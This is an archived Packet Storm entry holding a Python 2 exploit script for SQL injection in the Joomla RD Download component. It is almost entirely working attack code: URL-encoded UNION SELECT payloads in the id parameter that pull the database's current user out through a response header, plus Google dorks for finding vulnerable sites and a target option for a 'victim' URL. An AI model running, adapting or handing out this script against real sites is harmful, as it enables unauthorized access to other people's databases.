Lucene search

K
packetstormClaudio VivianiPACKETSTORM:128908
HistoryOct 29, 2014 - 12:00 a.m.

Joomla RD Download SQL Injection

2014-10-2900:00:00
Claudio Viviani
packetstormsecurity.com
22
`#!/usr/bin/python  
#  
# Exploit Name: Joomla RD Download SQL Injection  
#  
# Version: Unknown  
#  
# Exploit discovered and written by Claudio Viviani  
#  
# Dork google 1: inurl:index.php?option=com_rd_download  
# Dork google 2: inurl:/component/rd_download/  
#  
# Tested on BackBox 3.x  
#  
# http connection  
import urllib, urllib2  
# string manipulation  
import re  
# Errors management  
import sys  
# Args management  
import optparse  
  
# Check url  
def checkurl(url):  
if url[:8] != "https://" and url[:7] != "http://":  
print('[X] You must insert http:// or https:// procotol')  
sys.exit(1)  
else:  
return url  
  
banner = """  
_______ __   
| _ .-----.-----.--------| .---.-.   
|___| | _ | _ | | | _ |   
|. | |_____|_____|__|__|__|__|___._|   
|: 1 |   
|::.. . |   
`-------'   
_______ ______ ______ __ __   
| _ | _ \ | _ \ .-----.--.--.--.-----| .-----.---.-.--| |  
|. l |. | \ |. | \| _ | | | | | | _ | _ | _ |  
|. _ |. | \ |. | |_____|________|__|__|__|_____|___._|_____|  
|: | |: 1 / |: 1 /   
|::.|:. |::.. . / |::.. . /   
`--- ---`------' `------'   
J00ml4 RD D0wnl04d Sql1nj3ct10n  
  
Written by:  
  
Claudio Viviani  
  
http://www.homelab.it  
  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
"""  
  
commandList = optparse.OptionParser('usage: %prog -t URL')  
commandList.add_option('-t', '--target', action="store",  
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",  
)  
  
options, remainder = commandList.parse_args()  
  
# Check args  
if not options.target:  
print(banner)  
commandList.print_help()  
sys.exit(1)  
  
host = checkurl(options.target)  
  
evilurl = { '/component/rd_download/?view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/component/rd_download/?view=download&task=dl&id=[SQLi]',  
'/index.php?option=com_rd_download&view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/index.php?option=com_rd_download&view=download&task=dl&id=[SQLi]' }  
  
print(banner)  
  
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}  
  
for exploiting, dork in evilurl.iteritems():  
print "[*] Trying to connect to: "+host+dork  
try:  
req = urllib2.Request(host+exploiting, None, headers)  
response = urllib2.urlopen(req)  
  
response_header = response.info().getheader('Content-Disposition')  
if response_header:  
  
if "h0m3l4b1t" in response_header:  
print "[!] VULNERABLE"  
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response_header).group(1)  
print "[*] Username: "+str(current_user)  
sys.exit(0)  
else:  
print "[X] Not vulnerable :("  
else:  
print "[X] Not vulnerable :("  
except urllib2.HTTPError as e:  
print("[X] Http Error: "+str(e.code))  
except urllib2.URLError as e:  
print("[X] Connection Error: "+str(e.code))  
sys.exit(1)  
`